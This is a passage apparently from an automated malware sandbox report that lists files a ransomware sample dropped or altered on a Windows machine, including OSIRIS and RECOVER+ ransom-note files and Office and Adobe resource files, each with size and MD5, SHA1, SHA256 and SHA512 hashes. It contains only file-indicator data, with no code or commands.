                                                                                                                    669KB

                                                                                                                    MD5

                                                                                                                    0a67d8e81f5d963c85ef8a3a0a87a401

                                                                                                                    SHA1

                                                                                                                    bd1796ffd98a964294c428555c6d9e3c9eac953e

                                                                                                                    SHA256

                                                                                                                    65f1ef1230c18f413db6e9850f83be8aeca0cf4e6b9d06658c353522081e2b3e

                                                                                                                    SHA512

                                                                                                                    31c27f3798de41c53ab6fdb2a62a4350bcb9deaf410bb6f30f8fcba0138077aa4de1c786ec00553221166b68da07c8e58aa2896d25cfd5f15dfa4954186589dd

                                                                                                                  • C:\MSOCache\All Users\OSIRIS-d39e.htm

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    MD5

                                                                                                                    da858716485bc2adddc72c5b63d0f84d

                                                                                                                    SHA1

                                                                                                                    cd28ab4604c17b45d358065f63daa4fa89671d1e

                                                                                                                    SHA256

                                                                                                                    d746fa094a14122301ff7f535120e0732db9fcd4dd4cb37add92d7f2e491be60

                                                                                                                    SHA512

                                                                                                                    a1581a453d788ff82f6b491ea02141ff9b8f7a9070f18511dbaeaac42df0ce41f15e756a3d4365349420122d293bb4019c229d8843d98c3d5ed50093fbf0f8b3

                                                                                                                  • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\RECOVER+eihxu.HTM

                                                                                                                    Filesize

                                                                                                                    6KB

                                                                                                                    MD5

                                                                                                                    7459487489e157727e67d5d028b50143

                                                                                                                    SHA1

                                                                                                                    c93ec1359504f85e820851f308c1600c2e4d120e

                                                                                                                    SHA256

                                                                                                                    493fcc79d368b78448dd3ce373181ea429cfa1bf9a4cf59e22579840393232be

                                                                                                                    SHA512

                                                                                                                    f66bc4816708ee6903aa1aad383483a25cc34d1c962128aa68eb2d9c93eaa2ab5f4b2818ad09603b19a5de0a6b13bef1ebcc7d236d9aa3e94f0d2140e0b3d3e0

                                                                                                                  • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\RECOVER+eihxu.PNG

                                                                                                                    Filesize

                                                                                                                    67KB

                                                                                                                    MD5

                                                                                                                    1d8e4754ef23a2c1baf9d50348cfb491

                                                                                                                    SHA1

                                                                                                                    d54ad72ba7f10968b4fcd0ade79e124ee5c030b7

                                                                                                                    SHA256

                                                                                                                    e9ec5e9e8f800a94f43522453a669e383c4fcf8227ad7b78ab16adec2b3deb30

                                                                                                                    SHA512

                                                                                                                    c5ef7db536994e5af538c0a2a4f8600554714aaa1ed016dea132d3caa7127f386ad54d2da617f494fc4586fa75bf73ebbb2c3f28c1eb545fb946bed2dda7d1bf

                                                                                                                  • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\RECOVER+eihxu.TXT

                                                                                                                    Filesize

                                                                                                                    2KB

                                                                                                                    MD5

                                                                                                                    d0c3dd57b9968cc51ca8d727a9504ff8

                                                                                                                    SHA1

                                                                                                                    d9716fd2b01ded0364ff5d0cd50dd497218de270

                                                                                                                    SHA256

                                                                                                                    6d21672fef00aa4d4b068f8f033ab7fce6f16762dd3ee9bd98a5a27993e0a3e7

                                                                                                                    SHA512

                                                                                                                    5bb41e60abe42dbdd107fc2516e3baf7103dd4cf7fa6f96edd8cce6b04bf1570fbb6cd0a1d48500dcf2db5b436bc87f6fe49e05dac64fbf4011aa7215ad5b089

                                                                                                                  • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\_RECOVERY_+jejhg.html

                                                                                                                    Filesize

                                                                                                                    11KB

                                                                                                                    MD5

                                                                                                                    0ff73e3212ea3353497fa07c6158224c

                                                                                                                    SHA1

                                                                                                                    2023f1fcd3f0ed94a84103e370a6dbc7e65c409a

                                                                                                                    SHA256

                                                                                                                    79ce3b4e7fff1ce81238414112607bf25c46fab47a2b0c507d5453f3d5784477

                                                                                                                    SHA512

                                                                                                                    75511a01d15eb3e73e4c81369538dbc8564f85860c5f20ac73c77991b1a826a2aeba11c81a9127d1a61f5a63d7538b64f506684d72dfb13947a03c1a8314c471

                                                                                                                  • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\_RECOVERY_+jejhg.png

                                                                                                                    Filesize

                                                                                                                    63KB

                                                                                                                    MD5

                                                                                                                    c97e34dc32cb98cfb2b0cbf395003744

                                                                                                                    SHA1

                                                                                                                    5a34cff745b2ed48b6931983c84aeece8590e644

                                                                                                                    SHA256

                                                                                                                    cbb5d30c707597c7659e891ed945b05818c7834c6613532745b9a41f7cfc6056

                                                                                                                    SHA512

                                                                                                                    3f540460a22768e9541b434710fa37e902f2c7a068b7bc3e8464ed7baf0cc79cd36326f1ca429b5f03d8492b91a1803b90b78f429f66cff42327cd42ea3a803d

                                                                                                                  • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\_RECOVERY_+jejhg.txt

                                                                                                                    Filesize

                                                                                                                    1KB

                                                                                                                    MD5

                                                                                                                    351b5ab4c6e048f4e54cef886f958cc6

                                                                                                                    SHA1

                                                                                                                    60d9c43b0960f677df7841413dfba9f389a4bfab

                                                                                                                    SHA256

                                                                                                                    90bfe1ecdfa0a6e311a287fd4973b0b74b695c6c60442470bc71072373177cd3

                                                                                                                    SHA512

                                                                                                                    d1e83aeef931f3b1d0aa0341ace251d79f6a76ccd1506728489b365ab2d99237acb8394e23c91c9321f02ad48b3810d5e05d74c1821a2070a424505893d6497f

                                                                                                                  • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\_RECoVERY_+lfvsg.png

                                                                                                                    Filesize

                                                                                                                    36KB

                                                                                                                    MD5

                                                                                                                    790842ec65453722e23fe92277ed6b31

                                                                                                                    SHA1

                                                                                                                    f78868ca12891ffdc7c3acf33af487fe61829072

                                                                                                                    SHA256

                                                                                                                    eed23b57d6da5275a68b515e38f7e7c399efcb88a37b5686589aac32a8eaf120

                                                                                                                    SHA512

                                                                                                                    417b006dfc819996e3073f27bc490e63e8a9477a408da56f25ed54c400577a62f5bb398309783fcb82fd4bdd95a00dd255f5e3666f285b5fccf65743368d8bc3

                                                                                                                  • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\_RECoVERY_+lfvsg.txt

                                                                                                                    Filesize

                                                                                                                    892B

                                                                                                                    MD5

                                                                                                                    90a0321357d3453ad4e5e363c0636c44

                                                                                                                    SHA1

                                                                                                                    819da177c8adc834eb785994966db6f862d9353c

                                                                                                                    SHA256

                                                                                                                    56c3476b1f23de7e3276518e6ab82c07e980d862b99bfa091a9fc5f747d3097f

                                                                                                                    SHA512

                                                                                                                    b3a9d8884297259bdaac6198c94a179dbe93a9187170afa3f36b8fed6bd6bdf0fcdcdc72137661be5c7c4359086a687a21ed35c51c6bd56e55457e9d1ebe3603

                                                                                                                  • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+vvnox.html

                                                                                                                    Filesize

                                                                                                                    11KB

                                                                                                                    MD5

                                                                                                                    e46c984da455018c51486b716f3953c2

                                                                                                                    SHA1

                                                                                                                    6b6cd71ce167b590351406e2dff594ba418ccf59

                                                                                                                    SHA256

                                                                                                                    dcbb067ad61f28255b882d44d92a47bd0445266e783d02b38bb1ff71b6efa65e

                                                                                                                    SHA512

                                                                                                                    544d509dabb2dd91fe5b1f3ae9b2b1a481a25037d404a557eb79b485285c4d6a4e6e4c9a68f249ea659b8fec526969d66fae39971671e1a9b1fccea5e613bb2e

                                                                                                                  • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+vvnox.png

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                    MD5

                                                                                                                    38f6a048f9668b3f096061128ba7ed8e

                                                                                                                    SHA1

                                                                                                                    afedd4367999381c401aba16ac770daca9a34d05

                                                                                                                    SHA256

                                                                                                                    5ff1738f90071a19f651b5c8563c84a0e0bb4d03f9ba8a361a8c5361aa19fda5

                                                                                                                    SHA512

                                                                                                                    9402b6c8757d7f4d127142700e095618483431f9060e34003598e4738c6f5629bb766167ab3ccae5c4256f88b8993ab32c104695661a5995550083810f7a705a

                                                                                                                  • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+vvnox.txt

                                                                                                                    Filesize

                                                                                                                    1KB

                                                                                                                    MD5

                                                                                                                    0217290fa9d1f69d63f93ec133015f0a

                                                                                                                    SHA1

                                                                                                                    1c608ab5001596f69d587b0080a4d62d14445f77

                                                                                                                    SHA256

                                                                                                                    90f859d3422d06263bfd3387627e7ea95119e425cca58f3335d6ae1ef16670e6

                                                                                                                    SHA512

                                                                                                                    e3f41d293c14197c35286d028587392816adb3ba1921dc0766c9766fc6990c39decd2e0815752a525f0b47c09a6375173e2ba2e3c3a6e13672297421d6e4c121

                                                                                                                  • C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\OSIRIS-7cc0.htm

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    MD5

                                                                                                                    3c0bd626efba265ddb10ce5fd88434fc

                                                                                                                    SHA1

                                                                                                                    841bd899f063210b2cb49f9fe1570dcbc32d0e5e

                                                                                                                    SHA256

                                                                                                                    529d920b27fe068a9846b202147a7ddf6019571f6024ea572fc4f18b09b823c0

                                                                                                                    SHA512

                                                                                                                    3d8dde09c2bd54175a195e5f4e49e9cde335dedecefe6f9624d4aed7d650849c717b616b35040b9aa76c589235ab182ed414bdc2998b60af7ced208fe2932659

                                                                                                                  • C:\MSOCache\OSIRIS-08d6.htm

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    MD5

                                                                                                                    e8c8bfb2fd888a6d0ebaf8bcf388e593

                                                                                                                    SHA1

                                                                                                                    23a1654ba16f31b22428271329a2dc21569509a6

                                                                                                                    SHA256

                                                                                                                    deee32ede716d3b744acb6d7f62b3b91eb548e38dd2127ce7c1e8b87cfb71fc0

                                                                                                                    SHA512

                                                                                                                    acc55198c1d8a5ed512b3a4d6f1569e675d50d47145ad52df948cdc6ad558e4b060d8e6df6045fbc26747c57095511d387f26db60b4783a8ddbf08c232ef8760

                                                                                                                  • C:\MSOCache\OSIRIS-8d59.htm

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    MD5

                                                                                                                    a96ea5fc35f5ce16a5999fa042b5caca

                                                                                                                    SHA1

                                                                                                                    40bad9797991365267cedc66371701bd39fca753

                                                                                                                    SHA256

                                                                                                                    08450d7e4603e21f12a020b0e2c30bd173fc68396c154087993c2efd7444e5c7

                                                                                                                    SHA512

                                                                                                                    386b564346992698b404d807c16123f9b28e10d1b8af82e78308db943a909baacb95f60d26e410c9f7e33dba2a108cb01c2fd9b0df395bdfbf2c50fe7982b271

                                                                                                                  • C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt

                                                                                                                    Filesize

                                                                                                                    27KB

                                                                                                                    MD5

                                                                                                                    b2c517b027781aa776cd7e8a641cc499

                                                                                                                    SHA1

                                                                                                                    9973d650aa4ebd99be156a018ce89aa3448c1a93

                                                                                                                    SHA256

                                                                                                                    f113926aebf46b14ec3ce639183e6ea57b15f5e3a7157571cd552a4754b8823b

                                                                                                                    SHA512

                                                                                                                    4519f3a1fcb51b5721c55372af0cbe6c16d86cd19e3b37343e797fae76a400fba576e870dff205ca1d192bb06de025f259b88f6f97c36973e99733dbaf70e759

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_OFF.GIF

                                                                                                                    Filesize

                                                                                                                    400B

                                                                                                                    MD5

                                                                                                                    232cfd73bc131c96e3233e75765e9099

                                                                                                                    SHA1

                                                                                                                    578b2aa4cb3c6d2c7832ec6267e3effc1dcbb89f

                                                                                                                    SHA256

                                                                                                                    b3e357da981528342b43f57760d5cb572bbbb626cbedddcc9c8d734edda821b2

                                                                                                                    SHA512

                                                                                                                    020b134587a26f28e50aa885029819061e3f0747e1adbc483dfc6e57d4b5f6bd26f2656362ecf1b606dd1719563c0d5dc8deb91aa16bcb337364f898ff58342e

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\BUTTON.GIF

                                                                                                                    Filesize

                                                                                                                    240B

                                                                                                                    MD5

                                                                                                                    0c40a4e57d33506295dd151fcb9e8342

                                                                                                                    SHA1

                                                                                                                    fe297c81bafac00b7047bcf09664f1b42b523767

                                                                                                                    SHA256

                                                                                                                    96999561ffd5ee0cb2fa3e0e2c2c22454854aceb468f3e76ecbfa23df15f74e8

                                                                                                                    SHA512

                                                                                                                    beb13de65a2fce2c5b0fa5d70826ecd579eff8b133ef39e5dfa7230ff7beca0153e6e161f6ac7c906263d53f1e38204e37983b4b193e5dd423fddb98a2d65e0c

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\HEADER.GIF

                                                                                                                    Filesize

                                                                                                                    304B

                                                                                                                    MD5

                                                                                                                    b899f8590b305c547a9fe0044caa6588

                                                                                                                    SHA1

                                                                                                                    0ce059db909de8c74fad75a9285e7c08998c09e2

                                                                                                                    SHA256

                                                                                                                    b6102f1904863f8339678b3a41d96516f5416d1509ebcb72b9c23442ccaf9bcc

                                                                                                                    SHA512

                                                                                                                    f98961c98d20552d6e58fd39eace2489dd61229d8a7a5713747fb63daa8f11a0de2c0716bfe700571ec01c2af8e5becc8ea06cd9b83854ceedc053ef29cd1865

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\TAB_OFF.GIF

                                                                                                                    Filesize

                                                                                                                    400B

                                                                                                                    MD5

                                                                                                                    97366f037ba53246f6b7f4ad4af4f796

                                                                                                                    SHA1

                                                                                                                    0ad23ef35021c7ab5e181021feb8394a20a07409

                                                                                                                    SHA256

                                                                                                                    af5a3eac3ca79c23b23bc25e3b00c863f646454594c904a35a8f07ac3f0455fa

                                                                                                                    SHA512

                                                                                                                    49b4554f578de4b227e5721853baca783fc0e35237587e4288e2546a4222d8115455a1b07be7ba21fe164983cdc895d9129d841984b9fd187191081a825f6f17

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF

                                                                                                                    Filesize

                                                                                                                    400B

                                                                                                                    MD5

                                                                                                                    379bafd4e10086bcce5c81372138c4ca

                                                                                                                    SHA1

                                                                                                                    27c822e983a305dece438817930c877536674b53

                                                                                                                    SHA256

                                                                                                                    7b2af7fee8304e2e0d70f4119ab82d810a492a047cdd939bba37a7cdf387af15

                                                                                                                    SHA512

                                                                                                                    d2ef5071abc86b37cfb10fa113bbc41031c9fd5a78650a4605e323cc1b64a61e0cdcf65f5d432e27041d50d3e450b3507153ac8c702985e12fa2c375b6fdbe91

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\BUTTON.GIF

                                                                                                                    Filesize

                                                                                                                    240B

                                                                                                                    MD5

                                                                                                                    021273150c9741eeb23c4d227a070be2

                                                                                                                    SHA1

                                                                                                                    c623435f94651aaeb69cf76dfb92fc4e086f7880

                                                                                                                    SHA256

                                                                                                                    d42b83a4c11b18c76f61175432b8b2311ea2069f4b792bb67952bb819abfbc87

                                                                                                                    SHA512

                                                                                                                    cb0ea3aea5b5072e1946e7bf2a75f78e616477120ad955eb242d5aa42575b41d5e4bdcb528bcb0668985d060bb70359fa2fa852fb47443c0ec3ec91a0f0a323d

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\TAB_OFF.GIF

                                                                                                                    Filesize

                                                                                                                    400B

                                                                                                                    MD5

                                                                                                                    41435ca6eb4c36d7bbaebfb2483a2e1f

                                                                                                                    SHA1

                                                                                                                    637be5b2fd40c12a4e55c25319a1f93c1a1dec0b

                                                                                                                    SHA256

                                                                                                                    004a10b19c4a3814d30f93213bda78bd24ff0e54199a59cb028991de3b717baa

                                                                                                                    SHA512

                                                                                                                    f79fd2ffea99834873ada98d4e4598386e36bb0848d9ef637f95afdc315ca26876e91e96034745814616f074d05205f49ba2dfd5767b6afe76b7dd61fbfa55cb

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\background.gif

                                                                                                                    Filesize

                                                                                                                    384B

                                                                                                                    MD5

                                                                                                                    074aa27ab1a6dce381d88231ffc72f9e

                                                                                                                    SHA1

                                                                                                                    1970ea650f53196bf9c86a002975cddf0e2077e0

                                                                                                                    SHA256

                                                                                                                    6bf45c20176a9794939bc2385f84a0a70716447e711e51e0578ca23d83424beb

                                                                                                                    SHA512

                                                                                                                    784dc954a54fc9a7fad7d37cd666819c5d2d2f4ba773e565b9a4cd811f0248c68b41f0c292f7a410a3ae3f0a67f7efab2eb738a320311ac85e96310d87a0df42

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\HEADER.GIF

                                                                                                                    Filesize

                                                                                                                    416B

                                                                                                                    MD5

                                                                                                                    d687e6ef60af668d9fc4a44b61ff5d00

                                                                                                                    SHA1

                                                                                                                    e66dc53fe9cd6c41b1802252e4e2e45c19da5d0c

                                                                                                                    SHA256

                                                                                                                    59a13c52e04496e7a30645a2c7c583f718eea716d2a35b5d5492e68d3b21bdd8

                                                                                                                    SHA512

                                                                                                                    9b701b7f397137f5ff7b1341833abe2100c9af1321633d3b630fc943de3c5f5871c241fd4c81e4e34d2cb3fe7fadacf981152a6abd6873214676297e0acbd955

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\TAB_OFF.GIF

                                                                                                                    Filesize

                                                                                                                    400B

                                                                                                                    MD5

                                                                                                                    9e7a95aeb0373f47bc474541b77f4dda

                                                                                                                    SHA1

                                                                                                                    b1886fa085ffffc2330139f9fd201ccb74b617e0

                                                                                                                    SHA256

                                                                                                                    55156457713d8534ea0a27410ca61006637bccdfa1f0b110d922dd18a13b2945

                                                                                                                    SHA512

                                                                                                                    84b69e5b4d98c670de543863acabf4324f5fe5937035d4eea26c85c19ac6db9bc715c98ec327f37b5a913ac6273e2854fb0152948fbff19e04c2bfb645f2e55f

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\HEADER.GIF

                                                                                                                    Filesize

                                                                                                                    208B

                                                                                                                    MD5

                                                                                                                    e48e8b9a87b21be1e7818c2d02ba7a03

                                                                                                                    SHA1

                                                                                                                    24d3276e4d1d026af2150589d3c7e89ca3937dd1

                                                                                                                    SHA256

                                                                                                                    03d84191fcc83d77480dd5e074b9e771fb9bf68400d09f6433dfb65920080cd2

                                                                                                                    SHA512

                                                                                                                    ba3d81a76ba9ae4f93464274e4df202b44182ead7f5ac2eb04f8c7566573c12a690ba2a78ac382613910c4e52e811a6db84777218059dda81d81bcdea6121387

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\TAB_ON.GIF

                                                                                                                    Filesize

                                                                                                                    1KB

                                                                                                                    MD5

                                                                                                                    75920187c5cdba6010005ebe8717fcdb

                                                                                                                    SHA1

                                                                                                                    8e2a74a1e33e9ab52d946fb8286e578d4c6aabbe

                                                                                                                    SHA256

                                                                                                                    ce6d41500328f2a943402dd7687c5c8e8de5e524633508a070fc168321c429fc

                                                                                                                    SHA512

                                                                                                                    ff161c42d2610600ea01598d1c307a8f13cc369a8049121d662243f117b9602d67bcb7469a9233730855c6db9de501c5fcdfa45adaacd608764759e60bac983f

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\HEADER.GIF

                                                                                                                    Filesize

                                                                                                                    496B

                                                                                                                    MD5

                                                                                                                    c74c7259381e8ed920b24a8a55802ee8

                                                                                                                    SHA1

                                                                                                                    b3802b149c7e4652883832fa422d6d9f716ada82

                                                                                                                    SHA256

                                                                                                                    b66214218d222370760338326767c8e620830fb3b87f26fceb3364259a216693

                                                                                                                    SHA512

                                                                                                                    83a9ec8e7d6f3ade521fc1f35807f532ff6132ae10ad83f85fcca218c45dcd9e9b5c73841edeab1d1f99599d8b905aa015342215a4e18a05d175a7ed0a9f4f44

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\TAB_OFF.GIF

                                                                                                                    Filesize

                                                                                                                    400B

                                                                                                                    MD5

                                                                                                                    9d38069f7d9a3a8f5d13e31018df4fb9

                                                                                                                    SHA1

                                                                                                                    9d285eb0f7659bdb144b2bced968ff0bf8d6b829

                                                                                                                    SHA256

                                                                                                                    0e40146c33c85e49699deddca2ef2b4dba9c53f580331fc30a92bc8729d3334d

                                                                                                                    SHA512

                                                                                                                    6230858fa6da1f00269a04ed8ac8e8995213cccae054450d07b2d9fa0f166e1f0d85374aa1ea1e37581c34368931261c69241fbe0ac4a72a0222272f16c1f88d

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Lime\TAB_OFF.GIF

                                                                                                                    Filesize

                                                                                                                    512B

                                                                                                                    MD5

                                                                                                                    988080e654ebcf6ed29f90e1b0f7d141

                                                                                                                    SHA1

                                                                                                                    42703cdc65003ee6f804b93e012ddda51bf82254

                                                                                                                    SHA256

                                                                                                                    a2402a6ccfc97157797358c658d6a72ac1dd692549820b5c9a910a52434fb418

                                                                                                                    SHA512

                                                                                                                    4e27f507dc7c14dae108387f482ede7152f42c4a69ac62250b0023a7fd453916732cb72d714e414e362e66fbad35513aefe095a6a1ef82de6aa4d927e7e1953c

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Lime\TAB_ON.GIF

                                                                                                                    Filesize

                                                                                                                    320B

                                                                                                                    MD5

                                                                                                                    a2ce4a8dc0b887db629e66d991d64030

                                                                                                                    SHA1

                                                                                                                    6a1c50c40c2464962a6850149f1b1f0140722216

                                                                                                                    SHA256

                                                                                                                    67a27f08db91d01db66defc22a90e259cccd2f674f670c8e8ef38751a8b83b7e

                                                                                                                    SHA512

                                                                                                                    fe36927486b8ff33aa229c330c85e3a3bc838423fffd2795d196cd22160cc315a3dd3e520bdcbcfb524a1476fe402d0545148f1fb1dbf53d51403167db0301a3

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis\HEADER.GIF

                                                                                                                    Filesize

                                                                                                                    2KB

                                                                                                                    MD5

                                                                                                                    d032b2725243dd686e9c2b65cd611ad4

                                                                                                                    SHA1

                                                                                                                    8935d47ca39206fb5038de78bccd8ed990526093

                                                                                                                    SHA256

                                                                                                                    863e21ed763e5dfb32797680780cb7f294dd51f72cdedc897987fc96aaab4c09

                                                                                                                    SHA512

                                                                                                                    85d0069c9fa518c9a3b18facb1ef067f9a18d2619e2fd3eb04a30be0e412fbe7dab54c827fa0dcb3ab2c211ffd4c5d52a4931cbf28c441d5832086f1fe82f052

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis\TAB_ON.GIF

                                                                                                                    Filesize

                                                                                                                    1KB

                                                                                                                    MD5

                                                                                                                    546c0e6dee31a1305ccfd73aa5cfaeba

                                                                                                                    SHA1

                                                                                                                    78b417603061ab42d339e575c70f076ec37c5cfc

                                                                                                                    SHA256

                                                                                                                    e482ac200373659d0a3aaffc4a917c133e296aec111214453e530638025b830f

                                                                                                                    SHA512

                                                                                                                    e8d703731b7ff178cb936ccc3007285080e013a04a3b23cd19978d319b1f995c23c4eebc68c4e524934ddc5a818702cc05b2283d59015ae662f9c5c6bf6d6e20

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\HEADER.GIF

                                                                                                                    Filesize

                                                                                                                    3KB

                                                                                                                    MD5

                                                                                                                    7ddd128676182448268c748e89b462e0

                                                                                                                    SHA1

                                                                                                                    6988716e5416808493beaec3fb636fe8d46cc6a4

                                                                                                                    SHA256

                                                                                                                    c699f0595ae74e39c6aac871e548ee381a381e479e5cc3400dd114e4e1494d90

                                                                                                                    SHA512

                                                                                                                    01f95d40ad17071f599965335f8172dfaa5c3e5cbbde02826f4ece52232720ea98b3cde7965200002ee56e33f6a4c6875e3c2a7cbde9f8638fa275ac4a2e9b87

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\TAB_OFF.GIF

                                                                                                                    Filesize

                                                                                                                    512B

                                                                                                                    MD5

                                                                                                                    f91092d804fe34159ff1bb59722065f3

                                                                                                                    SHA1

                                                                                                                    fece66671abfcc973d8ad4dce980ecd0bb8b8199

                                                                                                                    SHA256

                                                                                                                    638a8395a1c945d09dac4c5db53fb67c95cdbf8a032b7b95fabdf578c1c84314

                                                                                                                    SHA512

                                                                                                                    b2f6c64514dfe9c19bafd8cfefe6bc3d3eb4f25cf25546b67ae73d94cf3b93f28dba7f862eb5321022209413eb745bf3acfdec22f4f81332e247db35aa841136

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\TAB_ON.GIF

                                                                                                                    Filesize

                                                                                                                    320B

                                                                                                                    MD5

                                                                                                                    02fda130252845380dc40440ffd5e03a

                                                                                                                    SHA1

                                                                                                                    1904722febaf299eafdf11e69ee674fc1fa9d976

                                                                                                                    SHA256

                                                                                                                    9f3cd3dc76266491eb713b2d31d55ad375d5e35dadbdebf3fc44af31e88376ce

                                                                                                                    SHA512

                                                                                                                    662caa11ff978f3ae01f58982b7b9636d09199a3d362d1c15d8e28274d707520ea1f3bcffc28d035674450677216f4e9263299bff6f841e38c7d08562562725d

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\background.gif

                                                                                                                    Filesize

                                                                                                                    288B

                                                                                                                    MD5

                                                                                                                    a11f9fabd24277d7077891590ef48c8f

                                                                                                                    SHA1

                                                                                                                    d78a8dfaf9de658471b69134460db4ab705cdcf6

                                                                                                                    SHA256

                                                                                                                    e8fcdb34e5e5e770d6be4eda0ba1f5e1fc8028c6e2bf7ce0a7217fbb23276bc8

                                                                                                                    SHA512

                                                                                                                    0212755a5077634b5f2b2bf88aae6162e2986bb003121e54c73f048b6bfa5710f421b1b20fa0a2b44d32f5408ecd9566244a2a007fc6d64762f42c5152a722cd

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Slate\TAB_OFF.GIF

                                                                                                                    Filesize

                                                                                                                    416B

                                                                                                                    MD5

                                                                                                                    5e575061579c189347d170f3c3272763

                                                                                                                    SHA1

                                                                                                                    9b5509e61837bd1814ac591928bf5060f9ecbd38

                                                                                                                    SHA256

                                                                                                                    00a05266d099060fe277944348524595bc5e8fbd5aa56aa564d359fb44588747

                                                                                                                    SHA512

                                                                                                                    6ce68f16f925a309e46cfa7a3e4e12c4beaff8996eb172525d993d73fbe6b7a0ee546342c466d03aee71932431235f3a2be37a55936001e122be5dad750b479e

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Slate\TAB_ON.GIF

                                                                                                                    Filesize

                                                                                                                    416B

                                                                                                                    MD5

                                                                                                                    62b684668ab3bf2a1a0d77c0efdef6e9

                                                                                                                    SHA1

                                                                                                                    ecd265e8f2068591897d043fe1f3b9a28bd6fb06

                                                                                                                    SHA256

                                                                                                                    ad1877886ef0ac5d159249ae2c6d67f91624eca73acdd6821442275c5e9b7ed5

                                                                                                                    SHA512

                                                                                                                    f88f90779ad7beb02892b44f6884819cd8a7e78cddb3c626ebd125d3e7f7ce6f5766c5872e8fe71b28103ef9d29a9cc3f42b4be53fa738be2fb3f74264caeaaf

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\TAB_OFF.GIF

                                                                                                                    Filesize

                                                                                                                    400B

                                                                                                                    MD5

                                                                                                                    d72135eeb5a5e2f4fca6c3d4618aa029

                                                                                                                    SHA1

                                                                                                                    532257941c46782eb9d4ae65e523f8c5e7939ca1

                                                                                                                    SHA256

                                                                                                                    edbc0c8767de2ba8cbc43536a4f115708c523733da6a93d1c701eac7d1f69b1e

                                                                                                                    SHA512

                                                                                                                    f370c4e4b6b684f6a06c9105893596bf4c00ec7393cbab2d337ab036f29606d68f489ca10b8e89f72e9c62305bc238049b860d0ad8cf91fa275723a7495ec8e1

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\background.gif

                                                                                                                    Filesize

                                                                                                                    6KB

                                                                                                                    MD5

                                                                                                                    36dda1f76e64ea47db9f78c90e07158f

                                                                                                                    SHA1

                                                                                                                    53bbc52765976156f8a0a093df47e6e48f114e09

                                                                                                                    SHA256

                                                                                                                    5a70aa450ba5a586545fc3c46b041ee8bc50852a0d6ae6129931973c912ef6a1

                                                                                                                    SHA512

                                                                                                                    f5a2561be05d11aafefcffb9230e2ea3ddb39018e3139d3858b083127150b2f78de5034161958f92a8ee24acf02235ea1900f182a8e4750f5c384c84a37ba289

                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\BUTTON.GIF

                                                                                                                    Filesize

                                                                                                                    480B

                                                                                                                    MD5

                                                                                                                    a946579b3eb90abf7320e9978333a059

                                                                                                                    SHA1

                                                                                                                    940c18228f0661ec6af68e62f86a1b9dd9c2a918

